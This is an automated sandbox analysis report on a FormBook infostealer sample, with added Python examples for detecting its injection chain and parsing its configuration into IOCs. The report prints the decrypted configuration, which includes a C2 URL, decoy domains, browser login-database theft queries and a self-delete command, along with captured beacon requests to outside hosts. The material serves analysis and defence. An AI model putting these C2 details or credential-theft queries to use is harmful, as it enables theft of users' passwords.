

Analysis Report Inv.exe

Overview

General Information

Sample Name: Inv.exe
Analysis ID: 339347
MD5: a3aba7d40da6c8c86e4e8d035803f314
SHA1: 469b36f05939d6ec6457f1b72ba9f6c7a960be06
SHA256: 1f94eb81e3cde4f677fd210e1ff7f5d06987cbdc2fa7de79e28b224e49244b40
Tags: exe, Formbook


Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Uses netstat to query active network connections and open ports
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match


Startup

  • System is w10x64
  • Inv.exe (PID: 1848 cmdline: 'C:\Users\user\Desktop\Inv.exe' MD5: A3ABA7D40DA6C8C86E4E8D035803F314)
    • Inv.exe (PID: 4700 cmdline: 'C:\Users\user\Desktop\Inv.exe' MD5: A3ABA7D40DA6C8C86E4E8D035803F314)
      • explorer.exe (PID: 3424 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • autofmt.exe (PID: 6448 cmdline: C:\Windows\SysWOW64\autofmt.exe MD5: 7FC345F685C2A58283872D851316ACC4)
        • NETSTAT.EXE (PID: 6460 cmdline: C:\Windows\SysWOW64\NETSTAT.EXE MD5: 4E20FF629119A809BC0E7EE2D18A7FDB)
          • cmd.exe (PID: 6740 cmdline: /c del 'C:\Users\user\Desktop\Inv.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6760 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup
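
The tree above is the whole FormBook execution chain in five hops: the dropper relaunches itself with an identical command line (the hollowing target, PID 4700), the hollowed copy injects into explorer.exe, explorer.exe starts a SysWOW64 binary with no arguments (autofmt.exe, then NETSTAT.EXE, which becomes the process that talks to the network), and that binary runs cmd.exe /c del on the original sample. The following is an added detection example, not part of the report or of Joe Sandbox: it replays those hops as process-creation events and applies three rules plus a chaining step. The events are constructed from the PIDs and command lines above; the event field names, the parents of PID 1848 and of explorer.exe, and the cmd.exe image path are assumptions. Note that the report nests explorer.exe under PID 4700 because the sandbox draws injection targets as children; a real process-creation feed shows explorer.exe with its normal parent, which is why the rules below do not rely on that edge.

```python
"""Spot the FormBook injection chain in process-creation events.

Added example, not part of the sandbox report. EVENTS is constructed from the
report's Startup tree; ppid 900/800, the event schema and the cmd.exe image
path are assumptions (the report shows only cmd.exe's command line).
"""
import ntpath
import re

EVENTS = [
    {"pid": 1848, "ppid": 900, "image": "C:\\Users\\user\\Desktop\\Inv.exe",
     "cmdline": "'C:\\Users\\user\\Desktop\\Inv.exe'"},
    {"pid": 4700, "ppid": 1848, "image": "C:\\Users\\user\\Desktop\\Inv.exe",
     "cmdline": "'C:\\Users\\user\\Desktop\\Inv.exe'"},
    # explorer.exe is an injection target; its real parent is not in the report.
    {"pid": 3424, "ppid": 800, "image": "C:\\Windows\\explorer.exe",
     "cmdline": ""},
    {"pid": 6448, "ppid": 3424, "image": "C:\\Windows\\SysWOW64\\autofmt.exe",
     "cmdline": "C:\\Windows\\SysWOW64\\autofmt.exe"},
    {"pid": 6460, "ppid": 3424, "image": "C:\\Windows\\SysWOW64\\NETSTAT.EXE",
     "cmdline": "C:\\Windows\\SysWOW64\\NETSTAT.EXE"},
    {"pid": 6740, "ppid": 6460, "image": "C:\\Windows\\SysWOW64\\cmd.exe",  # assumed image path
     "cmdline": "/c del 'C:\\Users\\user\\Desktop\\Inv.exe'"},
    {"pid": 6760, "ppid": 6740, "image": "C:\\Windows\\System32\\conhost.exe",
     "cmdline": "C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1"},
]

DEL_CMD = re.compile(r"/c\s+del\s+['\"]?(?P<path>[^'\"]+)", re.IGNORECASE)

SELF_RELAUNCH = "SELF_RELAUNCH"
EXPLORER_BARE_SYSWOW64 = "EXPLORER_BARE_SYSWOW64"
DELETE_TRACED_EXE = "DELETE_TRACED_EXE"


def _name(path):
    return ntpath.basename(path).lower()


def detect(events):
    """Return (pid, tag) findings from three per-process rules."""
    by_pid = {e["pid"]: e for e in events}
    traced_images = {e["image"].lower() for e in events}
    findings = []
    for e in events:
        image = e["image"].lower()
        parent = by_pid.get(e["ppid"])
        # Rule 1: a user-path executable starts a copy of itself with the same
        # command line (suspended relaunch used for process hollowing).
        if (parent and parent["image"].lower() == image
                and image.startswith("c:\\users\\")):
            findings.append((e["pid"], SELF_RELAUNCH))
        # Rule 2: explorer.exe starts a SysWOW64 binary whose command line is
        # nothing but the image path; an interactive shell rarely does that.
        bare = e["cmdline"].strip().strip("'\"").lower() == image
        if (parent and _name(parent["image"]) == "explorer.exe"
                and "\\syswow64\\" in image and bare):
            findings.append((e["pid"], EXPLORER_BARE_SYSWOW64))
        # Rule 3: cmd.exe deletes a file that itself executed in this trace.
        if _name(image) == "cmd.exe":
            m = DEL_CMD.search(e["cmdline"])
            if m and m.group("path").lower() in traced_images:
                findings.append((e["pid"], DELETE_TRACED_EXE))
    return findings


def injection_chains(events, findings):
    """Pair each self-deleting cmd.exe with a flagged bare SysWOW64 parent."""
    by_pid = {e["pid"]: e for e in events}
    tags = {}
    for pid, tag in findings:
        tags.setdefault(pid, set()).add(tag)
    chains = []
    for pid, t in tags.items():
        parent_pid = by_pid[pid]["ppid"]
        if DELETE_TRACED_EXE in t and EXPLORER_BARE_SYSWOW64 in tags.get(parent_pid, set()):
            chains.append((parent_pid, pid))
    return chains


if __name__ == "__main__":
    found = detect(EVENTS)
    for pid, tag in found:
        print(pid, tag)
    print("chains:", injection_chains(EVENTS, found))
```

Rule 2 on its own is the one to tune: legitimate launches from explorer.exe usually carry arguments or a quoted path, but a single bare SysWOW64 launch is only a medium-confidence signal. The chain (a bare SysWOW64 child of explorer.exe whose own child deletes a file that ran earlier) is what turns it into a high-confidence alert.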

Malware Configuration

Threatname: FormBook

{"Config: ": ["CONFIG_PATTERNS 0x8bc3", "KEY1_OFFSET 0x1d6f3", "CONFIG SIZE : 0xd9", "CONFIG OFFSET 0x1d7ed", "URL SIZE : 28", "searching string pattern", "strings_offset 0x1c373", "searching hashes pattern", "--------------------------------------------------", "Decrypted Function Hashes", "--------------------------------------------------", "0xb201d05d", "0xf43668a6", "0x980476e5", "0x35a6d50c", "0xf89290dc", "0x94261f57", "0x7d54c891", "0x47cb721", "0xf72d70a3", "0x9f715030", "0xbf0a5e41", "0x2902d074", "0xf653b199", "0xc8c42cc6", "0x2e1b7599", "0x210d4d07", "0x6d2a7921", "0x8ea85a2f", "0x207c50ff", "0xb967410a", "0x1eb17415", "0xb46802f8", "0x11da8518", "0xf42ed5c", "0x2885a3d3", "0x445675fa", "0x5c289b4c", "0x40ede5aa", "0xf24946a2", "0x8559c3e2", "0xb9d34d23", "0xa14d0a19", "0x2d07bbe2", "0xbbd1d68c", "0xb28c29d4", "0x3911edeb", "0xefad046d", "0xa0605497", "0xf5529cbf", "0x5507576a", "0xfa2467c8", "0x5b6423bf", "0xe22409b9", "0xde1eba2", "0xae847e2", "0xa8cfcc9", "0x26fc2c69", "0x5d8a75ac", "0x22eb3474", "0x2b37c918", "0x79402007", "0x7544791c", "0x641b2c94", "0x1db04ecf", "0xf5d02cd8", "0xad012164", "0x6206e716", "0x5e4b9b9a", "0xe4e2f5f4", "0x54c93159", "0x25ea79b", "0x5bf29119", "0xd6507db", "0x32ffc9f8", "0xe4cfab72", "0x98db5380", "0xce4cc542", "0x3092a0a2", "0x66053660", "0x2607a133", "0xfcd015d1", "0x80b41d4", "0x4102ad8d", "0x857bf6a6", "0xd3ec6064", "0x23145fc4", "0xc026698f", "0x8f5385d8", "0x2430512b", "0x3ebe9086", "0x4c6fddb5", "0x276db13e", "0xe00f0a8e", "0x85cf9404", "0xb2248784", "0xcdc7e023", "0x11f5f50", "0x1dd4bc1c", "0x8235fce2", "0x21b17672", "0xbba64d93", "0x2f0ee0d8", "0x9cb95240", "0x28c21e3f", "0x9347ac57", "0x9d9522dc", "0x911bc70e", "0x74443db9", "0xf04c1aa9", "0x6484bcb5", "0x11fc2f72", "0x2b44324f", "0x9d70beea", "0x59adf952", "0x172ac7b4", "0x5d4b4e66", "0xed297eae", "0xa88492a6", "0xb21b057c", "0x70f35767", "0xb6f4d5a8", "0x67cea859", "0xc1626bff", "0xb4e1ae2", "0x24a48dcf", "0xe11da208", "0x1c920818", "0x65f4449c", 
"0xc30bc050", "0x3e86e1fb", "0x9e01fc32", "0x216500c2", "0x48e207c9", "0x2decf13e", "0x19996921", "0xb7da3dd7", "0x47f39d2b", "0x6777e2de", "0xd980e37f", "0x963fea3b", "0xacddb7ea", "0x110aec35", "0x647331f3", "0x2e381da4", "0x50f66474", "0xec16e0c0", "0xf9d81a42", "0xd6c6f9db", "0xef3df91", "0x60e0e203", "0x7c81caaf", "0x71c2ec76", "0x25e431cc", "0x106f568f", "0x6a60c8a9", "0xb758aab3", "0x3b34de90", "0x700420f5", "0xee359a7e", "0xd1d808a", "0x47ba47a5", "0xff959c4c", "0x5d30a87d", "0xaa95a900", "0x80b19064", "0x9c5a481a", "0x1dd252d", "0xdb3055fc", "0xe0cf8bf1", "0x3a48eabc", "0xf0472f97", "0x4a6323de", "0x4260edca", "0x53f7fb4f", "0x3d2e9c99", "0xf6879235", "0xe6723cac", "0xe184dfaa", "0xe99ffaa0", "0xf6aebe25", "0xefadf9a5", "0x215de938", "0x757906aa", "0x84f8d766", "0xb6494f65", "0x13a75318", "0x5bde5587", "0xe9eba2a4", "0x6b8a0df3", "0x9c02f250", "0xe52a2a2e", "0xdb96173c", "0x3c0f2fc", "0xd45e157c", "0x4edd1210", "0x2b127ce0", "0xadc887b6", "0xf45a1c52", "0xc84869d7", "0x36dc1f04", "0x50c2a508", "0x3e88e8bf", "0x4b6374a6", "0x72a93198", "0x85426977", "0xea193e11", "0xea653007", "0xe297c9c", "0x65399e87", "0x23609e75", "0xb92e8a5a", "0xabc89476", "0xd989572f", "0x4536ab86", "0x3476afc1", "0xaf24a63b", "0x393b9ac8", "0x414a3c70", "0x487e77f4", "0xbee1bdf6", "0xc30c49a6", "0xcb591d7f", "0x5c4ee455", "0x7c81c71d", "0x11c6f95e", "--------------------------------------------------", "Decrypted Strings", "--------------------------------------------------", "USERNAME", "LOCALAPPDATA", "USERPROFILE", "APPDATA", "TEMP", "ProgramFiles", "CommonProgramFiles", "ALLUSERSPROFILE", "/c copy \"", "/c del \"", "\\Run", "\\Policies", "\\Explorer", "\\Registry\\User", "\\Registry\\Machine", "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion", "Office\\15.0\\Outlook\\Profiles\\Outlook\\", " NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\", "\\SOFTWARE\\Mozilla\\Mozilla ", "\\Mozilla", "Username: ", "Password: ", "formSubmitURL", "usernameField", 
"encryptedUsername", "encryptedPassword", "\\logins.json", "\\signons.sqlite", "\\Microsoft\\Vault\\", "SELECT encryptedUsername, encryptedPassword, formSubmitURL FROM moz_logins", "\\Google\\Chrome\\User Data\\Default\\Login Data", "SELECT origin_url, username_value, password_value FROM logins", ".exe", ".com", ".scr", ".pif", ".cmd", ".bat", "ms", "win", "gdi", "mfc", "vga", "igfx", "user", "help", "config", "update", "regsvc", "chkdsk", "systray", "audiodg", "certmgr", "autochk", "taskhost", "colorcpl", "services", "IconCache", "ThumbCache", "Cookies", "SeDebugPrivilege", "SeShutdownPrivilege", "\\BaseNamedObjects", "config.php", "POST ", " HTTP/1.1", "", "Host: ", "", "Connection: close", "", "Content-Length: ", "", "Cache-Control: no-cache", "", "Origin: http://", "", "User-Agent: Mozilla Firefox/4.0", "", "Content-Type: application/x-www-form-urlencoded", "", "Accept: */*", "", "Referer: http://", "", "Accept-Language: en-US", "", "Accept-Encoding: gzip, deflate", "", "dat=", "f-start", "apartmentsineverettwa.com", "forritcu.net", "hotroodes.com", "skinnerttc.com", "royaltrustmyanmar.com", "adreslog.com", "kaysbridalboutiques.com", "multitask-improvements.com", "geniiforum.com", "smarthomehatinh.asia", "banglikeaboss.com", "javlover.club", "affiliateclubindia.com", "mycapecoralhomevalue.com", "comparamuebles.online", "newrochellenissan.com", "nairobi-paris.com", "fwk.xyz", "downdepot.com", "nextgenmemorabilia.com", "achonabu.com", "stevebana.xyz", "jacmkt.com", "weownthenight187.com", "divshop.pro", "wewearceylon.com", "skyreadymix.net", "jaffacorner.com", "bakerlibra.icu", "femalecoliving.com", "best20banks.com", "millcityloam.com", "signature-office.com", "qlifepharmacy.com", "dextermind.net", "fittcycleacademy.com", "davidoff.sucks", "1033393.com", "tutorsboulder.com", "bonicc.com", "goodberryjuice.com", "zhaowulu.com", "teryaq.media", "a-zsolutionsllc.com", "bitcoincandy.xyz", "cfmfair.com", "annefontain.com", "princesssexyluxwear.com", 
"prodigybrushes.com", "zzhqp.com", "hwcailing.com", "translatiions.com", "azery.site", "wy1917.com", "ringohouse.info", "chartershome.com", "thongtinhay.net", "2201virginiacondo5.com", "laurieryork.net", "mujeresnegociantes.com", "anchoriaswimwear.com", "michaelsala.com", "esdeportebici.com", "ninjitsoo.com", "f-end", "--------------------------------------------------", "Decrypted CnC URL", "--------------------------------------------------", "www.nationshiphop.com/hko6/\u0000"]}
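
The extractor output above is one flat list: an extractor progress log, then three sections each introduced by a title between two dashed rows ("Decrypted Function Hashes", "Decrypted Strings", "Decrypted CnC URL"), with the decoy-domain list inside the strings section bracketed by "f-start" and "f-end" and the C2 URL still carrying its NUL terminator. The following is an added example, not part of the report or of the extractor, that turns such output into usable IOCs. It assumes exactly that layout; SAMPLE_CONFIG is a constructed, abbreviated copy of the report's output (the report lists far more hashes and domains).

```python
"""Turn the extractor's flat "Config" list into structured IOCs.

Added example, not part of the report or of the extractor. SAMPLE_CONFIG is a
constructed, abbreviated copy of the report's output.
"""
import json
import re

SEPARATOR = "-" * 50

SAMPLE_CONFIG = json.dumps({"Config: ": [
    "CONFIG_PATTERNS 0x8bc3", "KEY1_OFFSET 0x1d6f3", "CONFIG SIZE : 0xd9",
    "CONFIG OFFSET 0x1d7ed", "URL SIZE : 28", "searching string pattern",
    "strings_offset 0x1c373", "searching hashes pattern",
    SEPARATOR, "Decrypted Function Hashes", SEPARATOR,
    "0xb201d05d", "0xf43668a6", "0x980476e5",
    SEPARATOR, "Decrypted Strings", SEPARATOR,
    "USERNAME", "/c del \"", "\\Run",
    "SELECT origin_url, username_value, password_value FROM logins",
    "User-Agent: Mozilla Firefox/4.0", "dat=",
    "f-start", "apartmentsineverettwa.com", "millcityloam.com", "achonabu.com",
    "a-zsolutionsllc.com", "ninjitsoo.com", "f-end",
    SEPARATOR, "Decrypted CnC URL", SEPARATOR,
    "www.nationshiphop.com/hko6/\u0000",
]})


def is_separator(entry):
    """Separator rows are runs of dashes (50 of them in the report)."""
    return len(entry) >= 10 and set(entry) == {"-"}


def split_sections(items):
    """Group the flat list into {title: [entries]}.

    A title is the single entry between two separator rows; entries before
    the first title are the extractor's own progress log.
    """
    sections = {"_extractor_log": []}
    current = "_extractor_log"
    i = 0
    while i < len(items):
        if (is_separator(items[i]) and i + 2 < len(items)
                and is_separator(items[i + 2])):
            current = items[i + 1]
            sections[current] = []
            i += 3
            continue
        sections[current].append(items[i])
        i += 1
    return sections


def extract_iocs(raw_json):
    """Return C2 URL(s), the C2 path, decoy domains and credential-theft SQL."""
    items = json.loads(raw_json)["Config: "]
    sections = split_sections(items)

    strings = sections.get("Decrypted Strings", [])
    try:
        start, end = strings.index("f-start"), strings.index("f-end")
        decoys = strings[start + 1:end]
    except ValueError:
        decoys = []

    # The C2 URL is NUL-terminated in memory; drop the terminator.
    cnc = [u.rstrip("\x00") for u in sections.get("Decrypted CnC URL", [])]
    # The path component (here "/hko6/") is reused verbatim by every beacon.
    cnc_paths = sorted({re.sub(r"^[^/]*", "", u) for u in cnc})

    hashes = [int(h, 16) for h in sections.get("Decrypted Function Hashes", [])]
    return {
        "cnc_urls": cnc,
        "cnc_paths": cnc_paths,
        "decoy_domains": decoys,
        "api_hash_count": len(hashes),
        "credential_sql": [s for s in strings if s.upper().startswith("SELECT ")],
    }


if __name__ == "__main__":
    print(json.dumps(extract_iocs(SAMPLE_CONFIG), indent=2))
```

Two caveats when using the result for blocking: the decoy domains are mostly legitimate or parked sites that the bot contacts alongside the real C2, so block or alert on the C2 path and request shape rather than on the full domain list alone; and the "Decrypted Strings" section doubles as a capability summary (the Chrome and Firefox login-database queries and the Outlook profile registry paths show what the stealer component goes after).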

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000001.00000002.709447848.00000000013E0000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000001.00000002.709447848.00000000013E0000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
    • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b4f7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c4fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000001.00000002.709447848.00000000013E0000.00000040.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
    • 0x18419:$sqlite3step: 68 34 1C 7B E1
    • 0x1852c:$sqlite3step: 68 34 1C 7B E1
    • 0x18448:$sqlite3text: 68 38 2A 90 C5
    • 0x1856d:$sqlite3text: 68 38 2A 90 C5
    • 0x1845b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18583:$sqlite3blob: 68 53 D8 7F 8C
00000004.00000002.1046926366.0000000002A40000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000004.00000002.1046926366.0000000002A40000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
      • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b4f7:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c4fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
(16 further memory-dump matches not expanded in this export)

      Unpacked PEs

Source | Rule | Description | Author | Strings
0.2.Inv.exe.d90000.1.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
0.2.Inv.exe.d90000.1.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
        • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1b4f7:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1c4fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0.2.Inv.exe.d90000.1.raw.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
        • 0x18419:$sqlite3step: 68 34 1C 7B E1
        • 0x1852c:$sqlite3step: 68 34 1C 7B E1
        • 0x18448:$sqlite3text: 68 38 2A 90 C5
        • 0x1856d:$sqlite3text: 68 38 2A 90 C5
        • 0x1845b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x18583:$sqlite3blob: 68 53 D8 7F 8C
0.2.Inv.exe.d90000.1.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
0.2.Inv.exe.d90000.1.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
          • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8d62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x14885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x14987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x14aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x977a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x135ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa473:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1a6f7:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1b6fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
(7 further unpacked-PE matches not expanded in this export)

          Sigma Overview

          No Sigma rule has matched

          Signature Overview



          AV Detection:

Antivirus / Scanner detection for submitted sample
Source: Inv.exe | Avira: detected
Found malware configuration
Source: 0.2.Inv.exe.d90000.1.unpack | Malware Configuration Extractor: FormBook (same decrypted configuration as listed under Malware Configuration above)
Multi AV Scanner detection for submitted file
Source: Inv.exe | Virustotal: Detection: 39%
Source: Inv.exe | ReversingLabs: Detection: 45%
Yara detected FormBook
Source: Yara match | File source: 00000001.00000002.709447848.00000000013E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.1046926366.0000000002A40000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.709353232.0000000001200000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.1046222240.0000000000350000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.673713344.0000000000D90000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.709266055.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.1046964776.0000000002A70000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0.2.Inv.exe.d90000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Inv.exe.d90000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.Inv.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.Inv.exe.400000.0.raw.unpack, type: UNPACKEDPE
Machine Learning detection for sample
Source: Inv.exe | Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 0.2.Inv.exe.d90000.1.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 1.2.Inv.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Uses 32bit PE files
Source: Inv.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: Inv.exe | Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: netstat.pdbGCTL | source: Inv.exe, 00000001.00000002.709669837.00000000018F0000.00000040.00000001.sdmp
Source: Binary string: wscui.pdbUGP | source: explorer.exe, 00000002.00000000.685750168.0000000005A00000.00000002.00000001.sdmp
Source: Binary string: netstat.pdb | source: Inv.exe, 00000001.00000002.709669837.00000000018F0000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdbUGP | source: Inv.exe, 00000000.00000003.670292202.000000001A590000.00000004.00000001.sdmp, Inv.exe, 00000001.00000002.709683230.0000000001920000.00000040.00000001.sdmp, NETSTAT.EXE, 00000004.00000002.1047189715.0000000002DF0000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb | source: Inv.exe, NETSTAT.EXE
Source: Binary string: wscui.pdb | source: explorer.exe, 00000002.00000000.685750168.0000000005A00000.00000002.00000001.sdmp
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\Desktop\Inv.exe | Code function: 4x nop then pop esi | 1_2_004172FA
Source: C:\Users\user\Desktop\Inv.exe | Code function: 4x nop then pop ebx | 1_2_00407B05
Source: C:\Users\user\Desktop\Inv.exe | Code function: 4x nop then pop edi | 1_2_0040E44D
Source: C:\Users\user\Desktop\Inv.exe | Code function: 4x nop then pop edi | 1_2_00417D80
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4x nop then pop esi | 4_2_003672FA
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4x nop then pop ebx | 4_2_00357B05
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4x nop then pop edi | 4_2_0035E44D
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4x nop then pop edi | 4_2_00367D80

          Networking:

Uses netstat to query active network connections and open ports
Source: unknown | Process created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
Source: global traffic | HTTP traffic detected: GET /hko6/?OHiLR=jJBpdVbhUrMh9TJP&k2JxoV=9ExSQ4NEk+xqeDwz7kz53SpWI5tzJaWW64EQQFdVNavty5IFfZu+ty07sGNE8SwhRq/4 HTTP/1.1 | Host: www.millcityloam.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 (Data Ascii empty)
Source: global traffic | HTTP traffic detected: GET /hko6/?OHiLR=jJBpdVbhUrMh9TJP&k2JxoV=Ds6mycG6XVC6cOnx6IQpHboGdSODTK5baT5OF1Gnzp/H9CBW+9tUucbuBNfXcxevyFer HTTP/1.1 | Host: www.achonabu.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 (Data Ascii empty)
Source: global traffic | HTTP traffic detected: GET /hko6/?OHiLR=jJBpdVbhUrMh9TJP&k2JxoV=eHiVknBCI+BDKnmhqMCE00F5l7UznldHUBBF08pOLsPmMyvxBhFlr4jwGXO1VYCPd09p HTTP/1.1 | Host: www.a-zsolutionsllc.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 (Data Ascii empty)
Source: global traffic | HTTP traffic detected: GET /hko6/?k2JxoV=oEk1uwcTzyLRlLIEQvULAWzRIM6BrJQxm2nmuYWQkJ+zIoa1KldNyrAb+1j5GiVi4vc4&OHiLR=jJBpdVbhUrMh9TJP HTTP/1.1 | Host: www.nationshiphop.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 (Data Ascii empty)
IP address seen in connection with other malware
Source: Joe Sandbox View | IP Address: 198.54.117.217
Internet Provider seen in connection with other malware
Source: Joe Sandbox View | ASN Name: GOOGLEUS
Source: Joe Sandbox View | ASN Name: SINGLEHOP-LLCUS
Source: unknown | DNS traffic detected: queries for: www.millcityloam.com
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found
  Connection: close
  X-Powered-By: PHP/5.6.40
  Content-Type: text/html; charset=UTF-8
  X-UA-Compatible: IE=edge
  Expires: Wed, 11 Jan 1984 05:00:00 GMT
  Cache-Control: no-cache, must-revalidate, max-age=0
  Link: <https://abccarpetcare.com/wp-json/>; rel="https://api.w.org/"
